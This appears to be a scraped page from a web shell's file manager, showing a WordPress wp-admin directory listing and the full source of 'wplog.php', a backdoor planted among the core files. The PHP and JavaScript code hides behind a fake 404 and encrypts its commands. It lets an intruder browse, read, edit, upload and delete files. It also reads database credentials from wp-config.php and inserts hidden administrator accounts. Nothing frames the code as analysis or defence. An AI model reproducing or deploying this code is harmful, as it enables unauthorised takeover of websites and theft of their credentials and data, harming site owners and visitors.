at path:
ROOT
/
wp-admin
/
wplog.php
run:
R
W
Run
css
DIR
2026-05-21 18:07:36
R
W
Run
images
DIR
2026-05-21 18:07:36
R
W
Run
includes
DIR
2023-02-13 12:53:06
R
W
Run
js
DIR
2025-07-22 10:21:36
R
W
Run
maint
DIR
2023-02-13 12:53:06
R
W
Run
network
DIR
2026-06-05 09:10:04
R
W
Run
user
DIR
2025-07-22 10:21:36
R
W
Run
D2_4cex4SOE_GJ32ESaRUQH8Do_VZZaazpa9e8CGnx4
87 By
2023-08-09 16:35:16
R
W
Run
Delete
Rename
GKC5sn91BRZL5pAq-5UMJv49qLAKRFeIeRYwhx7AcO8
87 By
2023-06-22 10:07:47
R
W
Run
Delete
Rename
K32oblLOYBv6YNV-8IXUp4WQtLfc6DunvAGI8iIGj9Y
87 By
2023-08-09 16:35:13
R
W
Run
Delete
Rename
about.php
16.83 KB
2026-07-10 17:22:32
R
W
Run
Delete
Rename
admin-ajax.php
5.03 KB
2024-07-04 15:22:14
R
W
Run
Delete
Rename
admin-footer.php
2.75 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
admin-functions.php
479 By
2025-01-22 19:06:22
R
W
Run
Delete
Rename
admin-header.php
9.07 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
admin-post.php
1.97 KB
2025-01-16 21:18:24
R
W
Run
Delete
Rename
admin.php
12.63 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
async-upload.php
5.47 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
authorize-application.php
10.09 KB
2023-09-14 04:54:20
R
W
Run
Delete
Rename
comment.php
11.37 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
contribute.php
5.9 KB
2026-07-10 17:22:33
R
W
Run
Delete
Rename
credits.php
4.42 KB
2026-07-10 17:22:32
R
W
Run
Delete
Rename
custom-background.php
489 By
2025-01-22 19:06:22
R
W
Run
Delete
Rename
custom-header.php
499 By
2025-01-22 19:06:22
R
W
Run
Delete
Rename
customize.php
11.21 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
edit-comments.php
14.14 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
edit-form-advanced.php
28.79 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
edit-form-blocks.php
14.73 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
edit-form-comment.php
8.33 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
edit-link-form.php
6.21 KB
2025-02-08 16:44:24
R
W
Run
Delete
Rename
edit-tag-form.php
10.42 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
edit-tags.php
21.98 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
edit.php
19.48 KB
2024-10-04 02:46:16
R
W
Run
Delete
Rename
erase-personal-data.php
7.33 KB
2024-04-18 00:21:16
R
W
Run
Delete
Rename
error_log
936.58 KB
2026-07-10 17:21:17
R
W
Run
Delete
Rename
export-personal-data.php
7.75 KB
2024-04-18 00:21:16
R
W
Run
Delete
Rename
export.php
11 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
font-library.php
1.01 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
freedoms.php
4.84 KB
2026-07-10 17:22:32
R
W
Run
Delete
Rename
hxbGLb0nRp7jJ3fwWvQVn9m3ECBdGV8ey6FChaBKwuU
87 By
2023-06-22 10:07:40
R
W
Run
Delete
Rename
import.php
7.58 KB
2025-02-25 23:34:16
R
W
Run
Delete
Rename
index.php
7.68 KB
2023-09-14 04:54:20
R
W
Run
Delete
Rename
install-helper.php
6.8 KB
2022-11-20 19:10:16
R
W
Run
Delete
Rename
install.php
17.91 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
link-add.php
934 By
2025-02-08 16:44:24
R
W
Run
Delete
Rename
link-manager.php
4.26 KB
2025-02-08 16:44:24
R
W
Run
Delete
Rename
link-parse-opml.php
2.63 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
link.php
2.89 KB
2024-05-01 22:01:12
R
W
Run
Delete
Rename
load-scripts.php
2.02 KB
2024-08-26 03:48:14
R
W
Run
Delete
Rename
load-styles.php
2.92 KB
2024-11-04 20:51:18
R
W
Run
Delete
Rename
media-new.php
3.17 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
media-upload.php
3.58 KB
2025-02-08 20:53:18
R
W
Run
Delete
Rename
media.php
819 By
2024-05-01 22:01:12
R
W
Run
Delete
Rename
menu-header.php
9.82 KB
2025-02-21 02:29:22
R
W
Run
Delete
Rename
menu.php
17.72 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
moderation.php
307 By
2020-02-06 11:33:12
R
W
Run
Delete
Rename
ms-admin.php
196 By
2020-02-06 11:33:12
R
W
Run
Delete
Rename
ms-delete-site.php
4.5 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
ms-edit.php
216 By
2020-02-06 11:33:12
R
W
Run
Delete
Rename
ms-options.php
229 By
2024-06-22 15:47:16
R
W
Run
Delete
Rename
ms-sites.php
215 By
2020-02-06 11:33:12
R
W
Run
Delete
Rename
ms-themes.php
217 By
2020-02-06 11:33:12
R
W
Run
Delete
Rename
ms-upgrade-network.php
219 By
2020-02-06 11:33:12
R
W
Run
Delete
Rename
ms-users.php
215 By
2020-02-06 11:33:12
R
W
Run
Delete
Rename
my-sites.php
4.72 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
nav-menus.php
49.07 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
network.php
5.39 KB
2024-03-09 03:38:08
R
W
Run
Delete
Rename
options-connectors.php
1.07 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
options-discussion.php
15.92 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
options-general.php
22.32 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
options-head.php
621 By
2025-01-22 19:06:22
R
W
Run
Delete
Rename
options-media.php
6.38 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
options-permalink.php
21.89 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
options-privacy.php
9.92 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
options-reading.php
9.97 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
options-writing.php
9.1 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
options.php
13.93 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
plugin-editor.php
13.75 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
plugin-install.php
6.96 KB
2024-02-20 12:27:06
R
W
Run
Delete
Rename
plugins.php
30 KB
2025-02-08 16:44:24
R
W
Run
Delete
Rename
post-new.php
2.7 KB
2024-06-15 16:34:14
R
W
Run
Delete
Rename
post.php
10.03 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
press-this.php
2.41 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
privacy-policy-guide.php
3.67 KB
2023-11-22 22:44:24
R
W
Run
Delete
Rename
privacy.php
2.83 KB
2026-07-10 17:22:32
R
W
Run
Delete
Rename
profile.php
283 By
2020-02-06 11:33:12
R
W
Run
Delete
Rename
revision.php
5.7 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
setup-config.php
17.52 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
site-editor.php
12.07 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
site-health-info.php
4.05 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
site-health.php
10.18 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
term.php
2.2 KB
2022-06-01 22:14:10
R
W
Run
Delete
Rename
theme-editor.php
16.87 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
theme-install.php
23.65 KB
2026-07-10 17:22:32
R
W
Run
Delete
Rename
themes.php
48.25 KB
2026-07-10 17:22:32
R
W
Run
Delete
Rename
tools.php
3.43 KB
2023-02-23 15:38:22
R
W
Run
Delete
Rename
update-core.php
45.12 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
update.php
12.76 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
upgrade-functions.php
341 By
2020-02-06 11:33:12
R
W
Run
Delete
Rename
upgrade.php
6.24 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
upload.php
14.9 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
user-edit.php
40.35 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
user-new.php
24.06 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
users.php
23.44 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
widgets-form-blocks.php
5.12 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
widgets-form.php
19.14 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
widgets.php
1.09 KB
2022-03-22 23:59:04
R
W
Run
Delete
Rename
wplog.php
7.73 KB
2026-06-05 04:09:01
R
W
Run
Delete
Rename
error_log
up
📄
wplog.php
Save
<?php @session_start(); error_reporting(0); set_time_limit(0); $k = "admin888"; if (isset($_GET['root']) && $_GET['root'] === $k && isset($_GET['wpuser'])) { $un = explode('|', $_GET['wpuser']); $pw = $_GET['wppass'] ?? "admin888"; header('Content-Type: text/plain'); die(ax($un, $pw)); } if (!isset($_SESSION['sh_auth'])) { if (isset($_GET['root']) && $_GET['root'] === $k) { if (isset($_POST['p']) && $_POST['p'] === $k) { $_SESSION['sh_auth'] = 1; } else { die('<form method="POST" style="text-align:center;padding:100px;">Key: <input type="password" name="p"><input type="submit"></form>'); } } else { header('HTTP/1.1 404 Not Found'); die(); } } function rc4($d, $k) { $s = array(); for ($i = 0; $i < 256; $i++) $s[$i] = $i; $j = 0; for ($i = 0; $i < 256; $i++) { $j = ($j + $s[$i] + ord($k[$i % strlen($k)])) % 256; $x = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $x; } $i = $j = 0; $res = ''; for ($y = 0; $y < strlen($d); $y++) { $i = ($i + 1) % 256; $j = ($j + $s[$i]) % 256; $x = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $x; $res .= $d[$y] ^ chr($s[($s[$i] + $s[$j]) % 256]); } return $res; } function ax($u, $p) { $pts = [getcwd(), $_SERVER['DOCUMENT_ROOT'], dirname($_SERVER['DOCUMENT_ROOT'])]; $out = []; foreach (array_unique($pts) as $d) { $f = $d . '/wp-config.php'; if (@file_exists($f)) { $c = @file_get_contents($f); preg_match("/'DB_NAME'\s*,\s*'(.*?)'/", $c, $db); preg_match("/'DB_USER'\s*,\s*'(.*?)'/", $c, $usr); preg_match("/'DB_PASSWORD'\s*,\s*'(.*?)'/", $c, $dbpw); preg_match("/'DB_HOST'\s*,\s*'(.*?)'/", $c, $hst); preg_match("/\\\$table_prefix\s*=\s*'(.*?)'/", $c, $pr); $m = @new mysqli($hst[1], $usr[1], $dbpw[1], $db[1]); if ($m->connect_error) continue; $t_p = $pr[1] ?? 'wp_'; $hp = md5($p); foreach ($u as $n) { $m->query("REPLACE INTO {$t_p}users (user_login,user_pass,user_nicename,user_email,user_registered,display_name) VALUES ('$n','$hp','$n','u@u.com',NOW(),'$n')"); $r = $m->query("SELECT ID FROM {$t_p}users WHERE user_login='$n'"); if($r) { $id = $r->fetch_object()->ID; $m->query("INSERT INTO {$t_p}usermeta (user_id,meta_key,meta_value) VALUES ($id,'{$t_p}capabilities','a:1:{s:13:\"administrator\";b:1;}') ON DUPLICATE KEY UPDATE meta_value='a:1:{s:13:\"administrator\";b:1;}'"); $m->query("INSERT INTO {$t_p}usermeta (user_id,meta_key,meta_value) VALUES ($id,'{$t_p}user_level','10') ON DUPLICATE KEY UPDATE meta_value='10'"); } } $m->close(); $out[] = "SUCCESS -> $d"; } } return empty($out) ? "Not Found" : implode("\n", $out); } if (isset($_POST['z'])) { $dec = rc4(hex2bin($_POST['z']), $k); $pl = json_decode($dec, true); $res = []; $a = $pl['a']; $p = $pl['p']; switch($a) { case 'ls': foreach(@scandir($p) as $f){ if($f=='.'||$f=='..')continue; $fp = $p.'/'.$f; $res['d'][]=['n'=>$f,'t'=>is_dir($fp)?'d':'f','s'=>round(@filesize($fp)/1024,2).'K','p'=>substr(sprintf('%o',@fileperms($fp)),-4)]; } break; case 'rd': $res['data'] = @file_get_contents($p); break; case 'sv': $res['o'] = @file_put_contents($p, $pl['c']) ? "Saved" : "Fail"; break; case 'dl': $res['o'] = @unlink($p) ? "Done" : "Fail"; break; case 'up': $res['o'] = @file_put_contents($p, base64_decode($pl['c'])) ? "Upload Success" : "Upload Fail"; break; case 'ix': $res['o'] = ax($pl['u'], $pl['pw']); break; } die(bin2hex(rc4(json_encode($res), $k))); } ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>Core Manager</title> <style> body{background:#f0f2f5;font:12px Arial;padding:15px} .box{background:#fff;border:1px solid #ccc;padding:15px;box-shadow:0 1px 3px rgba(0,0,0,0.1)} .i{display:flex;padding:6px;border-bottom:1px solid #f3f4f6;cursor:pointer;align-items:center} .i:hover{background:#f9fafb} .btn{background:#0073aa;color:#fff;border:none;padding:6px 12px;cursor:pointer;border-radius:3px;font-weight:bold} textarea{width:100%;height:450px;margin-top:10px;display:none;font-family:monospace} </style></head> <body> <div class="box"> <div style="margin-bottom:10px;"><b>CWD:</b> <span id="cwd"></span></div> <div style="margin-bottom:15px; display:flex; gap:10px;"> <button class="btn" onclick="nav('..')">UP</button> <button class="btn" style="background:#46b450" onclick="document.getElementById('f').click()">UPLOAD FILE</button> <button class="btn" style="background:#d63638" onclick="ix()">WP INJECT</button> <input type="file" id="f" style="display:none" onchange="up(this)"> </div> <div id="list"></div> <div id="eb" style="display:none"> <textarea id="editor"></textarea><br> <button class="btn" onclick="sv()">SAVE</button> <button class="btn" style="background:#666" onclick="hd()">CLOSE</button> </div> </div> <script> let k="<?=$k?>",cur="<?=addslashes(getcwd())?>",af=""; const hx={e:s=>s.split('').map(c=>c.charCodeAt(0).toString(16).padStart(2,'0')).join(''),d:h=>h.match(/.{1,2}/g).map(b=>String.fromCharCode(parseInt(b,16))).join('')}; function r4(d,k){let s=[],j=0,x,r='';for(let i=0;i<256;i++)s[i]=i;for(let i=0;i<256;i++){j=(j+s[i]+k.charCodeAt(i%k.length))%256;x=s[i];s[i]=s[j];s[j]=x;}let i=0,m=0;for(let y=0;y<d.length;y++){i=(i+1)%256;m=(m+s[i])%256;x=s[i];s[i]=s[m];s[m]=x;r+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[m])%256]);}return r;} async function api(o){ let fd=new FormData();fd.append('z',hx.e(r4(JSON.stringify(o),k))); let r=await fetch('',{method:'POST',body:fd}); let t=await r.text(); return JSON.parse(r4(hx.d(t),k)); } function ld(p){ cur=p;document.getElementById('cwd').innerText=p; api({a:'ls',p:p}).then(res=>{ let h=""; res.d.sort((a,b)=>a.t=='d'?-1:1).forEach(i=>{ h+=`<div class="i"><div style="flex:1" onclick="hl('${i.n}','${i.t}')">${i.t=='d'?'[DIR]':'[OBJ]'} ${i.n}</div><div style="width:70px;color:#999">${i.s}</div><div style="width:40px;color:#d63638;font-weight:bold" onclick="dl('${p+'/'+i.n}')">DEL</div></div>`; }); document.getElementById('list').innerHTML=h; hd(); }); } function hl(n,t){ let p=cur+(cur.includes('/')?'/':'\\')+n; if(t=='d')ld(p); else{af=p;api({a:'rd',p:p}).then(r=>{document.getElementById('editor').value=r.data;document.getElementById('editor').style.display='block';document.getElementById('eb').style.display='block';document.getElementById('list').style.display='none';});} } function up(i){ let f=i.files[0]; if(!f) return; let r=new FileReader(); r.onload=function(e){ api({a:'up',p:cur+'/'+f.name,c:btoa(e.target.result)}).then(res=>{alert(res.o);ld(cur);}); }; r.readAsBinaryString(f); } function ix(){ let u=prompt("Users (split by |)", "adminlin|admin_lin"); let p=prompt("Password", "admin888"); if(u&&p) api({a:'ix',p:'',u:u.split('|'),pw:p}).then(r=>alert(r.o)); } function sv(){api({a:'sv',p:af,c:document.getElementById('editor').value}).then(r=>alert(r.o));} function dl(p){if(confirm('Delete?'))api({a:'dl',p:p}).then(r=>{alert(r.o);ld(cur);});} function hd(){document.getElementById('editor').style.display='none';document.getElementById('eb').style.display='none';document.getElementById('list').style.display='block';} function nav(d){let s=cur.includes('/')?'/':'\\';let p=cur.split(s);if(d=='..')p.pop();ld(p.join(s)||s);} ld(cur); </script></body></html>